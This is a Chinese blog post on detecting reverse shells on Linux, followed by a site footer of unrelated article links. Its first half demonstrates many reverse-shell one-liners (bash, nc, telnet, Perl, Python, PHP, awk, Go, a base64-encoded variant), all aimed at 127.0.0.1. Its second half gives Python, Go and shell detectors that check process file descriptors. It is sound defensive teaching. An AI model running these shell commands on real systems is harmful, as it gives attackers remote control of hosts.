反弹shell检测的一些思路

前言

反弹shell是攻击者常用的手段之一,通过反弹Shell,攻击者可以绕过防火墙,获取目标系统的shell访问权限,进行后续的恶意操作。因此,及时检测并阻止反弹Shell行为对于安全防护来说非常重要。本文通过介绍反弹shell的常用手段,探讨检测的思路以及简单的代码实现。

反弹shell

基本概念

反弹shell常用于防火墙或网络策略仅允许出站连接,并限制未授权的入站连接的情景。利用允许出站后门连接的这一点,攻击者可以绕过通过基于入站规则的网络防护,从而远程控制目标计算机。

举个例子,在一台目标Linux系统上,攻击者可能会利用某个漏洞执行如下命令,使目标机创建一个反弹Shell到攻击者的服务器:

bash -i >& /dev/tcp/ip/端口 0>&1 

在这个命令中:

  • bash -i表示启动一个交互式的bash终端。

  • >& /dev/tcp/攻击者的IP地址/端口 这一部分使得bash通过TCP连接与攻击者的IP地址和端口通信。

0>&1将标准输入(0)重定向到标准输出(1),确保输入和输出都通过网络连接。

反弹Shell的本质是一种网络连接的反转操作,将命令行界面从远程系统重定向回攻击者的控制终端。

常用手法

Bash
监听:nc -lvvp 2333
连接:bash -i >& /dev/tcp/127.0.0.1/2333 0>&1  #TCP

执行效果如下:

可以看到命令执行完之后,创建了一个常住进程bash -i, 它的01文件描述符都指向socket

监听:nc -u -lvp 2333
连接:sh -i >& /dev/udp/127.0.0.1/2333 0>&1 

执行效果如下:

可以看到,执行完创建了一个常住进程sh -i, 它的的01文件描述符都指向socket

0<&196;exec 196<>/dev/tcp/127.0.0.1/2333; sh <&196 >&196 2>&196

执行效果如下:

可以看到,执行完创建了sh进程,01描述符都指向了socket

exec 5<>/dev/tcp/127.0.0.1/2333; while read line 0<&5; do $line 2>&5 >&5; done

执行效果如下:

可以看到创建了sh进程,01描述符都指向了socket

nohup bash -c 'bash -i >& /dev/tcp/127.0.0.1/2333 0>&1'

base64转一下试试呢

echo "nohup bash -c 'bash -i >& /dev/tcp/127.0.0.1/2333 0>&1'" | base64 -w0
echo bxx(说是敏感词,自己转一下哈)odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvMjMzMyAwPiYxJwo= | base64 -d | bash 2>/dev/null

执行效果如下:

可以看到创建了bash进程,01描述符都指向了socket

nc
nc -e /bin/sh 127.0.0.1 2333
如果nc 不支持 -e
nc  127.0.0.1 2333 | /bin/sh #Blind
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc  127.0.0.1 2333 1>/tmp/bkpipe
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc  127.0.0.1 2333 >/tmp/f

执行完之后,可以看到目标机创建了sh进程,01描述符都指向了pipe,这两个pipe关联到文件nc上。nc创建了socket外联。如图所示:

Telnet

当/dev/tcp不可用,且目标主机和攻击机上支持Telnet服务时,可以使用Telnet反弹shell。

基础的命令
telnet 127.0.0.1 2333 | /bin/sh 

执行效果如下:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet 127.0.0.1 2333 >/tmp/f
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet 127.0.0.1 2333 1>/tmp/bkpipe

可以看到以上的执行完了之后,都创建了sh进程,01描述符都指向了pipe

telnet 127.0.0.1 2333 | /bin/bash | telnet 127.0.0.1 1234

这个创建了bash进程,01描述符都指向了pipe

Perl
perl -e 'use Socket;$i="127.0.0.1";$p=2333;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[127.0.0.1]:[2333]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

执行效果如下:


 

执行完之后创建了sh进程,01描述符都指向了socket

Python
export RHOST="127.0.0.1";export RPORT=2333;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

执行效果如下:

目标机创建了sh进程,01描述符都指向了socket

php
php -r '$sock=fsockopen("127.0.0.1",2333);exec("/bin/sh -i <&3 >&3 2>&3");'

执行效果如下:

执行完之后,目标机上创建了sh进程,01描述符都指向了socket

Awk
awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/2333"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

执行效果如下:

创建了一个常住进程sh, 它的的01文件描述符都指向socket

Golang
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:2333");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

目标机执行后的结果如下:

创建了sh进程,01描述符都指向了pipe

介于篇幅考虑,Java,Nodejs,openssl,Metasploit,lua,Ruby等,我这就不演示了哈。

大家可以去试一下,你会发现shell环境(包括shashbshcshkshzshpdkshtcshbash)的进程01(或某一个)文件描述符都关联到socket或者pipe

检测思路

通过上面的演示中,归纳起来,shell环境的进程如果01(或某一个)文件描述符都关联到socket或者pipe,就认为它是反弹shell。

通过检查进程的文件描述符0(标准输入)和1(标准输出),是否都被关联到了socket或者pipe如果是,则认为是反弹shell行为。

基本实现
Python
import osdef is_socket_or_pipe(fd_path):
if os.path.exists(fd_path):
if os.path.islink(fd_path):
fd_target = os.readlink(fd_path)
return 'socket:' in fd_target or 'pipe:' in fd_target
return Falsedef get_process_details(pid):
process_details = {'pid': pid}cmdline_path = f'/proc/{pid}/cmdline'
environ_path = f'/proc/{pid}/environ'
status_path = f'/proc/{pid}/status'# 读取进程的命令行信息
try:
with open(cmdline_path, 'r') as cmdline_file:
cmdline = cmdline_file.read()
cmdline = cmdline.replace('\x00', ' ').strip()  # cmdline参数是以\x00分隔的
process_details['cmdline'] = cmdline
except Exception:
process_details['cmdline'] = 'Unavailable'# 读取进程的环境变量
try:
with open(environ_path, 'r') as environ_file:
environ = environ_file.read()
environ = environ.replace('\x00', ', ').strip()  # 环境变量以\x00分隔
process_details['environ'] = environ
except Exception:
process_details['environ'] = 'Unavailable'# 读取进程状态信息,如名称、状态等
try:
with open(status_path, 'r') as status_file:
status_lines = status_file.readlines()
for line in status_lines:
if line.startswith('Name:') or line.startswith('State:'):
key, value = line.split(':')
process_details[key.strip().lower()] = value.strip()
except Exception:
process_details['name'] = 'Unavailable'
process_details['state'] = 'Unavailable'return process_detailsdef check_all_processes_for_reverse_shell():
for pid in os.listdir('/proc'):
if pid.isdigit():
fd_dir = f'/proc/{pid}/fd'
stdin_fd = f'{fd_dir}/0'
stdout_fd = f'{fd_dir}/1'try:
stdin_is_socket_or_pipe = is_socket_or_pipe(stdin_fd)
stdout_is_socket_or_pipe = is_socket_or_pipe(stdout_fd)if stdin_is_socket_or_pipe and stdout_is_socket_or_pipe:
details = get_process_details(pid)
print(f"Process {pid} 可能存在反弹shell:\n{details}\n")
except FileNotFoundError:
continue
except PermissionError:
continueif __name__ == '__main__':
check_all_processes_for_reverse_shell()
运行效果:

Golang
package mainimport (
"fmt"
"os"
"path/filepath"
"strconv"
"strings"
)type ProcessInfo struct {
PID     string
Command string
}func main() {
processList := GetProcessList()
for _, process := range processList {
if isReboundShell(process.PID) {
fmt.Printf("Rebound Shell Detected: %+v\n", process)
}
}
}func GetProcessList() []ProcessInfo {
processPath := "/proc"
processDirs, err := os.ReadDir(processPath)
if err != nil {
fmt.Printf("Error reading /proc: %s\n", err)
return nil
}processList := make([]ProcessInfo, 0, len(processDirs))
for _, dir := range processDirs {
if !dir.IsDir() {
continue
}
pidStr := dir.Name()
_, err := strconv.Atoi(pidStr)
if err != nil {
continue
}command := readCmdlineFile(pidStr)p := ProcessInfo{
PID:     pidStr,
Command: command,
}processList = append(processList, p)
}return processList
}func readCmdlineFile(pidStr string) string {
cmdlineFile := filepath.Join("/proc", pidStr, "cmdline")
cmdlineBytes, err := os.ReadFile(cmdlineFile)
if err != nil {
return ""
}
cmdline := strings.ReplaceAll(string(cmdlineBytes), string(0), " ")
return strings.TrimSpace(cmdline)
}func isReboundShell(pidStr string) bool {
fd0Path := filepath.Join("/proc", pidStr, "fd", "0")
fd1Path := filepath.Join("/proc", pidStr, "fd", "1")fd0Target, err0 := os.Readlink(fd0Path)
fd1Target, err1 := os.Readlink(fd1Path)if err0 != nil || err1 != nil {
return false
}if (strings.HasPrefix(fd0Target, "socket:") || strings.HasPrefix(fd0Target, "pipe:")) &&
(strings.HasPrefix(fd1Target, "socket:") || strings.HasPrefix(fd1Target, "pipe:")) {
return true
}return false
}
运行效果

Shell
#!/bin/bash# 检查每个进程的文件描述符
for pid in $(ps -e | awk '{if(NR>1) print $1}'); do
# 忽略不存在的进程的错误信息
if [ ! -d /proc/$pid ]; then
continue
fi# 检查标准输入 (fd 0)
fd0=$(ls -l /proc/$pid/fd/0 2>/dev/null)
# 检查标准输出 (fd 1)
fd1=$(ls -l /proc/$pid/fd/1 2>/dev/null)# 使用grep检查fd是否是socket或pipe
if echo "$fd0" | grep -qE 'socket|pipe'; then
if echo "$fd1" | grep -qE 'socket|pipe'; then
echo "可能的反弹Shell进程: PID=$pid"
# 使用tr命令替换空字符为一个空格
cmdline=$(tr '\0' ' ' < /proc/$pid/cmdline)
echo "命令行: $cmdline"
fi
fi
done
运行效果

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/451061.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Kafka原理剖析之「Purgatory(炼狱 | 时间轮)」

一、前言 本文介绍一下Kafka赫赫有名的组件Purgatory&#xff0c;相信做Kafka的朋友或多或少都对其有一定的了解&#xff0c;至少是听过它的名字。那它的作用是什么呢&#xff0c;用来解决什么问题呢&#xff1f;官网confluent早就有文章对其做了阐述 https://cwiki.apache.o…

Redis和Jedis的区别

目录 含义与用途 Jedis案例 总结 含义与用途 Redis&#xff1a; 概念&#xff1a;Redis是一个基于内存的键值存储数据库&#xff0c;支持丰富的数据结构。比如&#xff1a;字符串功能&#xff1a;除了基础的数据存储&#xff0c;Redis还提供了丰富的高级功能。如持久化&…

golang生成并分析cpu prof文件

1. 定义一个接口&#xff0c;请求接口时&#xff0c;生成cpu.prof文件 在主协程中新启一个协程&#xff0c;当请求接口时&#xff0c;生成一个60秒的cpu.prof文件 go func() {http.HandleFunc("/prof", startProfileHandler)http.ListenAndServe(":9092"…

MySQL中什么情况下类型转换会导致索引失效

文章目录 1. 问题引入2. 准备工作3. 案例分析3.1 正常情况3.2 发生了隐式类型转换的情况 4. MySQL隐式类型转换的规则4.1 案例引入4.2 MySQL 中隐式类型转换的规则4.3 验证 MySQL 隐式类型转换的规则 5. 总结 如果对 MySQL 索引不了解&#xff0c;可以看一下我的另一篇博文&…

markdown 笔记,语法,技巧

起因&#xff0c; 目的: markdown 有些语法&#xff0c;不常用&#xff0c;记不住。单独记录一下。 1. 插入数学公式 用 $$ 来包裹住多行数学公式。 $$ 多行数学公式 $$ 2. 2个星号 ** &#xff0c; 加粗&#xff0c; 3. 单行代码的 引用&#xff0c; 左右各一个顿号 8.…

HTML_文本标签

概念&#xff1a; 1、用于包裹&#xff1a;词汇、短语等。 2、通常写在排版标签里面。 3、排版标签更宏观(大段的文字)&#xff0c;文本标签更微观(词汇、短语)。 4、文本标签通常都是行内元素。 常用的文本标签 标签名 全称 标签语义em Emphasized 加重(文本)。要着重阅…

数字图像处理:图像复原应用

数字图像处理&#xff1a;图像复原应用 1.1 什么是图像复原&#xff1f; 图像复原是图像处理中的一个重要领域&#xff0c;旨在从退化&#xff08;例如噪声、模糊等&#xff09;图像中恢复出尽可能接近原始图像的结果。图像复原与图像增强不同&#xff0c;复原更多地依赖于图…

3D一览通常见问题QA

感谢大家一直以来对大腾智能3D一览通的支持&#xff0c;我们致力于提供便捷高效的3D协同服务。这里小编整理了一些关于3D一览通的常见问题&#xff0c;以便大家更好地了解和使用3D一览通。 Q&#xff1a;3D一览通的功能是什么&#xff1f; 3D一览通是大腾智能打造的一款云端轻…

如何在 JSON 中编写“anyOf”语句?

在 JSON 中&#xff0c;anyOf 语句通常用于 JSON Schema&#xff08;JSON 模式&#xff09;中&#xff0c;来定义多个可能的模式&#xff0c;表示数据可以匹配多个子模式中的任意一个。这种功能常用于验证 JSON 数据是否符合某一组可能的条件之一。 1、问题背景 问题&#xff…

【计算机网络 - 基础问题】每日 3 题(三十六)

✍个人博客&#xff1a;https://blog.csdn.net/Newin2020?typeblog &#x1f4e3;专栏地址&#xff1a;http://t.csdnimg.cn/fYaBd &#x1f4da;专栏简介&#xff1a;在这个专栏中&#xff0c;我将会分享 C 面试中常见的面试题给大家~ ❤️如果有收获的话&#xff0c;欢迎点赞…

MongoDB 的安装详情

在虚拟机里面opt下 新建一个mongodb文件夹 再新建一个opt/mongodb/data文件夹&#xff0c; 然后将挂载的mongodb数据放到data文件夹里&#xff1a; 【把mongodb的数据挂载出来&#xff0c;以后我们再次重启的时候 数据起码还会在】 冒号右边 挂载到左边的路径 docker run -…

Matlab终于能够实现Transformer预测了

声明&#xff1a;文章是从本人公众号中复制而来&#xff0c;因此&#xff0c;想最新最快了解各类智能优化算法及其改进的朋友&#xff0c;可关注我的公众号&#xff1a;强盛机器学习&#xff0c;不定期会有很多免费代码分享~ 目录 原理简介 数据介绍 结果展示 完整代码 今…

ubuntu24 修改ip地址 ubuntu虚拟机修改静态ip

1. ubuntu 修改地址在/etc/netplan # 进入路径 cd /etc/netplan # 修改文件夹下的配置文件&#xff0c;我的是50-cloud-init.yaml. ye可能你得是20-cloud-init.yaml 2. 修改为&#xff1a; dhcp4: 改为false 192.168.164.50 是我自己分配的ip地址, /24 为固定写法&#xff…

数据结构与算法:堆与优先队列的深入剖析

数据结构与算法&#xff1a;堆与优先队列的深入剖析 堆是一种特殊的树形数据结构&#xff0c;广泛应用于优先队列的实现以及各种高效的算法中&#xff0c;如排序和图算法。通过深入了解堆的结构、不同堆的实现方式&#xff0c;以及堆在实际系统中的应用&#xff0c;我们可以掌…

初级网络工程师之从入门到入狱(四)

本文是我在学习过程中记录学习的点点滴滴&#xff0c;目的是为了学完之后巩固一下顺便也和大家分享一下&#xff0c;日后忘记了也可以方便快速的复习。 网络工程师从入门到入狱 前言一、Wlan应用实战1.1、拓扑图详解1.2、LSW11.3、AC11.4、抓包1.5、Tunnel隧道模式解析1.6、AP、…

服务器软件之Tomcat

服务器软件之Tomcat 服务器软件之Tomcat 服务器软件之Tomcat一、什么是Tomcat二、安装Tomcat1、前提&#xff1a;2、下载3、解压下载的tomcat4、tomcat启动常见错误4.1、tomcat8.0 startup报错java.util.logging.ErrorManager: 44.2、java.lang.UnsatisfiedLinkError 三、Tomca…

LVGL模拟器使用以及安装

LVGL模拟器介绍 LVGL模拟器&#xff1a;使用PC端软件模拟LVGL运行&#xff0c;而不需要任何嵌入式硬件。 优点&#xff1a;便于学习、跨平台协同开发。 我这里使用的是CodeBlocks。 环境搭建及工程获取 环境搭建 安装包获取&#xff1a;https://www.codeblocks.org/downlo…

vue后台管理系统从0到1搭建(4)各组件的搭建

文章目录 vue后台管理系统从0到1搭建&#xff08;4&#xff09;各组件的搭建Main.vue 组件的初构 vue后台管理系统从0到1搭建&#xff08;4&#xff09;各组件的搭建 Main.vue 组件的初构 根据我们的效果来看&#xff0c;分析一下&#xff0c;我们把左边的区域分为一个组件&am…

云计算作业一:问题解决备忘

教程地址&#xff1a;https://blog.csdn.net/qq_53877854/article/details/142412784 修改网络配置文件 vim /etc/sysconfig/network-scripts/ifcfg-ens33在root用户下编辑 静态ip地址配置后查看ip与配置不符 注意&#xff1a;确保在这之前已经在VMware的编辑>虚拟网络编…

2024年9月中国电子学会青少年软件编程(Python)等级考试试卷(一级)答案 + 解析

一、单选题 1、下列选项中关于 turtle.color(red) 语句的作用描述正确的是&#xff1f;&#xff08; &#xff09; A. 只设置画笔的颜色为红色 B. 只设置填充的颜色为红色 C. 设置画笔和填充的颜色为红色 D. 设置画笔的颜色为红色&#xff0c;设置画布背景的颜色为红色 正…